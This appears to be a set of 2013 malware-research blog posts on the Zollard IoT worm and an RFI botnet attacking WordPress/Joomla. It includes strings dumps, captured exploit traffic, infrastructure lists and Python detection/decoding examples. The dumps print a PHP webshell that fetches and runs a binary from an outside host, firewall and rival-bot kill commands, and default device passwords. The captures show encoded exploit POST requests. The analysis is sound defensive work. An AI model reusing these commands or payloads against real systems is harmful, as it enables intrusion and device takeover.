/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file (first dump above) and from 'ppc' file (second dump above)
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file (dump above)
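The dumps above are what `strings` produces by hand; the same artifacts (the User-Agent, the /var/run/.zollard/ directory, the killall line that removes rival bots) make a usable triage signature for a binary pulled off a device. As an added example (not the post's own code), the following Python implements a minimal strings extractor (runs of four or more printable bytes) and matches the result against indicators lifted from the dumps. The byte blob it runs on is constructed, and the indicator list is this example's own choice.

```python
"""Pull printable strings out of a binary and match them against indicators.

Added example, not the post's own code. The byte blob is constructed to contain
some of the strings the post's dumps show; the indicator list is built from
those dumps and is this example's choice.
"""
import re

MIN_LEN = 4


def extract_strings(data: bytes, min_len: int = MIN_LEN):
    """Runs of at least min_len printable ASCII bytes, like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Indicators taken verbatim from the strings dumps in the post.
ZOLLARD_INDICATORS = {
    "user_agent": "User-Agent: Zollard",
    "run_dir": "/var/run/.zollard/",
    "telnet_block": "iptables -A INPUT -p tcp --dport 23 -j DROP",
    "rival_kill": "killall arm ppc mips mipsel",
    "php_cgi_path": "/cgi-bin/php-cgi",
    "webshell_func": "function myshellexec($cmd)",
}


def match_indicators(strings, indicators=ZOLLARD_INDICATORS):
    """Map each indicator name to the first extracted string containing it."""
    found = {}
    for name, needle in indicators.items():
        for s in strings:
            if needle in s:
                found[name] = s
                break
    return found


def triage(data: bytes, min_hits: int = 2) -> dict:
    """Extract strings, match indicators, and give a verdict once min_hits
    independent indicators are present (one hit alone is too weak: the GCC
    banner and the php-cgi path both occur in benign files)."""
    strs = extract_strings(data)
    hits = match_indicators(strs)
    return {
        "strings": len(strs),
        "hits": hits,
        "verdict": "zollard-like" if len(hits) >= min_hits else "no match",
    }


# Constructed samples: an ELF-looking header, binary noise, embedded strings.
SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + b"\x13\x05\xa9"
    + b"User-Agent: Zollard\x00" + b"\xff\xfe"
    + b"/var/run/.zollard/\x00" + b"\x01ab\x02"
    + b"killall arm ppc mips mipsel\x00"
    + b"GCC: (GNU) 4.1.2\x00"
)
BENIGN = b"\x7fELF" + b"\x00" * 4 + b"Hello, world\x00" + b"GCC: (GNU) 4.1.2\x00"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE), ("benign", BENIGN)):
        report = triage(blob)
        print(label, report["verdict"], sorted(report["hits"]))
```

The `min_hits` threshold is the design point: a single string such as /cgi-bin/php-cgi is found in plenty of legitimate software, so the verdict requires at least two of the indicators to co-occur in one file.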

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend blocking IP address 78.39.232.113 and ensuring that all Internet-facing devices (yes, "devices") are strongly secured.

Friday, August 9, 2013

List of malware pcaps, samples, and indicators for the Library of Malware Traffic Patterns

The Library of Malware Traffic Patterns has been popular. We have found it very useful ourselves, and we encourage you to send your contributions. I know at some point the spreadsheet will become unwieldy, but I personally find it the easiest way (easy sort, search, etc.).

Currently, most of the samples described have the corresponding samples and pcaps available for download (email Mila @contagio for the password), such as you see in the links below:
http://bit.ly/crimesamples | http://bit.ly/crimepcaps
http://bit.ly/aptsamples | http://bit.ly/aptpcaps


Email us at mila [a t ] Deependresearch.org or adimino [a t] deependresearch.org


The current list of malware described (as of Aug. 9, 2013)


APT
1. 9002
2. 9002 POST
3. Banechant 1
4. Banechant payload dl 2
5. Beebus
6. Beebus C2 checkin
7. Beebus data send
8. Comfoo / Vinself / Mspub
9. Cookies / Cookiebag / Dalbot
10. Coswid
11. CVE-2012-0754 SWF in DOC
12. CVE-2012-0779
13. Depyot
14. Destory Rat / Sogu / Thoper
15. Disttrack / Shamoon
16. DNSWatch / Protux
17. Downloader BMP
18. Einstein
19. Einstein data send
20. Enfal / Lurid
21. Favorites
22. Foxy
23. Foxy Checkin
24. Gh0st
25. Gh0st ASP ver
26. Gh0st PHP ver
27. Gh0st v2000 var
28. Gh0st var
29. Glasses
30. GoogleAdC2
31. GoogleAdC2 2nd stage
32. Googles
33. Greencat
34. Gtalk
35. Hangover Smackdown Minapro
36. Hupigon / Graybird
37. icon.js - system info send
38. IEXPLORE Rat / C0D0S0 / Briba / Cimuz / SharkyRAT
39. IXESHE
40. IXESHE AES
41. KoreanBanker DL
42. Letsgo / TabMsgSQL
43. Letsgo / TabMsgSQL downloader
44. Likseput
45. Lingbo (?)
46. Luckycat - WIMMIE
47. LURK
48. Mediana Proxy
49. MiniASP
50. Miniduke
51. Miniflame
52. Mirage
53. Mirage - later var
54. Mongal
55. MSWab / Yayih
56. Murcy
57. Netravler
58. NfLog
59. NTESSESS
60. Pitty Tiger
61. Plugx
62. PNG trojan
63. Poison Ivy
64. Quarian
65. RedOctober AuthInfo
66. RedOctober Sysinfo
67. RegSubDat
68. RssFeeder
69. Sanny / Win32.Daws
70. Seasalt
71. Sofacy
72. Surtr 2nd Stage DL
73. Surtr Initial GET
74. Swami
75. Sykipot / Wyksol
76. Taidoor
77. Taleret
78. Tapaoux
79. Tarsip Eclipse
80. Tarsip Moon
81. Variant Letsgo / TabMsgSQL downloader (comment crew)
82. Vinself
83. WEBC2_RAVE
84. WEBC2-Bolid
85. WEBC2-Clover
86. WEBC2-CSON
87. WEBC2-CSON Response to commands
88. WEBC2-HEAD
89. WEBC2-Table
90. Xtreme Rat

CRIME and HACKTIVISM
Adware Hotbar
Alina POS v5.3-6
Andromeda
ArcomRat / Dokstormac
Ardamax keylogger
Asprox Checkin
Asprox GET list of C2s
Asprox GETs spam template
Avatar Rootkit
Beebone downloader
Bitcoinminer
Blackhole 2
Blackhole v2
Blazebot
Carberp
Citadel
Cutwail / Pushdo
Darkmegi
Darkness DDos v8g
DirtJumper DDoS
DNSChanger
EK - Blackhole 2 landing
EK Blackhole 1
EK Neutrino
EK Phoenix
EK Popads
FakeAV var (via Kuluoz - Asprox botnet)
Flashback OSX
GameThief
Gapz C&C request
Guntior - CN bootkit
Gypthoy
Hiloti
HOIC DDoS
Horst Proxy
Imaut
IRCbot
JBOSS worm
Karagany Loader
Kuluoz.B downloader
Matsnu - MBR wiping ransomware
Medfos
Money loader
Mutopy Downloader
Mutopy Downloader initial callback
PassAlert
Pony loader
PowerLoader
Ranbyus / Triton (Spy, Banking, smart cards)
Reedum
Shiz / Rohimafo DDoS
Srizbi
Stabuniq
Sweet Orange EK
Symmi Remote File Injector
Tbot tor
Tinba aka Zusy
Urausy (Ransomware)
USteal.D
Vobfus
Xpaj
ZeroAccess / Sirefef
ZeroAccess / Sirefef - Counter site checkin
ZeroAccess / Sirefef ppc fraud - redirect
Zeus
Zeus Gameover

Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3, VirusTotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) - 7958f73daf4b84e3b00e008258ea2e7a, VirusTotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08, VirusTotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners often get alerted about copious amounts of pharmaceutical and porn spam emanating from their sites). These scripts are also the source of the varied spam links: thousands of different URLs that all redirect to the same sites (e.g. weight-loss, work-at-home scams, or porn sites).

The "hackers" attacking the Wordpress servers are armies of compromised Windows desktops continuously checking the C&C servers for new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with the domain www.wholists.org.

The unpacked version of conhost.exe (7958F73DAF4B84E3B00E008258EA2E7A) contains a Base94 alphabet, which is used for encoding strings and communication requests in addition to the common Base64:

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

1. Examining the pcap shows the initial callback to 'www.wholists.org' on 95.163.104.69:

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org', where it requests 'conh11.jpg' for download. It is actually a Win32 executable rather than a JPEG file. The file's hash is 7958f73daf4b84e3b00e008258ea2e7a, and it is well detected on VirusTotal:
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3. Next, our bot sends a GET request for "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php:
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

Several PHP scripts were observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected into a vulnerable server. We link here to the PHP scripts we saw in use by this malware. The presence of any of these scripts on a CMS web server is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site:
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that the bots will target. After receiving a target URL from fw.point-up.org, the bot attempts exploits against it with various payloads. By dumping the virtual address descriptor (VAD) regions of the conhost.exe process, I was able to find references to CMS module paths with publicly reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies with the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 = success: OK followed by the MD5 of the string 1234567890 (e807f1fcf82d132f9bb018ca6738a19f). A fixed hash like this is a convenient network signature for a successful injection.
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed / Not Acceptable = request rejected. In the example below the 406 is generated by mod_security, so a WAF blocked the request; that says nothing about whether the JCE component behind it is present or patched, so a rejection cannot be read as proof that the host is not vulnerable.
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].org
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

3. 200 OK with a short text/html body (the 354-byte body is not reproduced in the post), seen against a third JCE path:
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


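The ae1.php reply body and the long dsmIC/dSgdS fields of the POST bodies above share one encoding: ordinary base64 whose decoded bytes only become readable after every byte is XORed with 0x02 (the leading `>WQGP<` becomes `<USER>`; the other tags are `<NAME>`, `<SUBJ>` and `<SBODY>`, so the blob is a post template carrying a persona, a display name, a subject and an HTML body with a link). The Python below is an added example written for this page, not the blog's or the malware's own code. It decodes that scheme, splits a captured POST body into its fields, and checks a target's reply against the `OK` + md5("1234567890") success marker. The POST body and template it runs on are constructed here; the only captured data it touches is the eight-character prefix `PldRR1A8`, so the output contains none of the personas or target sites encoded in the real blobs. The single-byte key is not stated anywhere in the traffic and was determined from the blobs themselves.

```python
import base64
import hashlib
import re
from urllib.parse import quote, unquote

# Single-byte XOR key. Not stated in the traffic; it is the only byte that turns the
# decoded prefix b'>WQGP<' of the captured blobs into b'<USER>'.
XOR_KEY = 0x02

# The "OK" reply carries md5("1234567890"), as noted in the post.
SUCCESS_MD5 = hashlib.md5(b"1234567890").hexdigest()

# Tags seen in the decoded template: <USER>, <NAME>, <SUBJ>, <SBODY>.
TAG_RE = re.compile(r"<([A-Z]+)>(.*?)</\1>", re.S)
OK_RE = re.compile(r"^OK([0-9a-f]{32})")


def decode_field(value: str) -> str:
    """Reverse the bot's field encoding: URL-decode, base64-decode, XOR each byte with 0x02."""
    b64 = "".join(unquote(value).split())  # captures are line-wrapped; drop stray whitespace
    raw = base64.b64decode(b64)            # raises binascii.Error (a ValueError) if not base64
    return bytes(b ^ XOR_KEY for b in raw).decode("latin-1")


def encode_field(text: str) -> str:
    """Inverse of decode_field; used only to build the constructed sample below."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in text.encode("latin-1"))).decode("ascii")


def parse_template(decoded: str) -> dict:
    """Pull the <TAG>...</TAG> sections out of a decoded post template."""
    return {m.group(1): m.group(2) for m in TAG_RE.finditer(decoded)}


def decode_post_fields(body: str) -> list:
    """Split an x-www-form-urlencoded body into (name, decoded_text) pairs, in order.
    Field names are randomised per request, so position is what identifies a field.
    decoded_text is None where the value is not base64 or does not decode to text."""
    fields = []
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        try:
            text = decode_field(value)
            if not all(c.isprintable() or c in "\r\n\t" for c in text):
                text = None
        except ValueError:
            text = None
        fields.append((name, text))
    return fields


def classify_response(status: int, body: str) -> str:
    """Map a target's reply to the outcome seen in the capture: injected, blocked, or unknown."""
    m = OK_RE.match(body.strip())
    if status == 200 and m and m.group(1) == SUCCESS_MD5:
        return "injected"
    if status == 406 or "Mod_Security" in body or "Not Allowed" in body:
        return "blocked"
    return "unknown"


# --- constructed sample: persona, host names and template are made up for this example ---
SAMPLE_TEMPLATE = (
    "<USER>example_user</USER>\n"
    '<NAME>"Example User"</NAME>\n'
    "<SUBJ>constructed subject line</SUBJ>\n"
    '<SBODY>\n<div><a href="http://example.invalid/">constructed link</a></div>\n</SBODY>\n'
)
SAMPLE_POST_BODY = "&".join([
    "aBcD=" + quote(encode_field("example_user@example.invalid")),  # persona address
    "eFgH=ZzZzZzZzZzZ",                                              # short token, not base64
    "iJkL=" + quote(encode_field("mail.example.invalid")),          # mail host
    "mNoP=" + quote(encode_field(SAMPLE_TEMPLATE)),                  # the post template
])

if __name__ == "__main__":
    print(decode_field("PldRR1A8"))  # prefix of the captured blob
    for name, text in decode_post_fields(SAMPLE_POST_BODY):
        print(name, "->", None if text is None else text.splitlines()[0])
    print(classify_response(200, "OK" + SUCCESS_MD5 + "+0"))
```

Feeding the captured blobs through decode_field recovers the full template, including the persona names and the link to the site being promoted, which is why only the prefix is used here.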

Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure.


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

Hostnames observed resolving to each of the five addresses (one column per address):

95.163.104.69 | 95.163.104.94 | 46.165.230.185 | 208.115.109.53 | 85.143.166.221
www.wholists.org | ns1.wholists.org | ns1.upsave.info | ntp.run-stat.org | fw.point-up.org
bns.wholists.org | ns1.store-apps.org | fw.stat-run.info | bt.ads-runner.org | ns2.memrem.ru
gjd.wholists.org | ns1.games-olympic.org | fw.run-stat.org | sk4.ads-runner.org | ns2.nalkanet.ru
lbh.wholists.org | ns1.googleminiapi.com | mail.stat-run.info | ntp.stat-run.info | ns2.nallanite.ru
qdp.wholists.org | peace.vijproject.com | bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org | sogood.vitaminavip.com | jc.upsave.info
ml.inviteyou.info | img.stat-run.info | ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 & 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013

In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack

Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013

For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2

Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013

In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534


Monday, May 6, 2013

Library of Malware Traffic Patterns


Update May 6, 2013: We added the ability to download the corresponding samples and pcaps (when available). Same password scheme as contagio. Email Mila if needed.

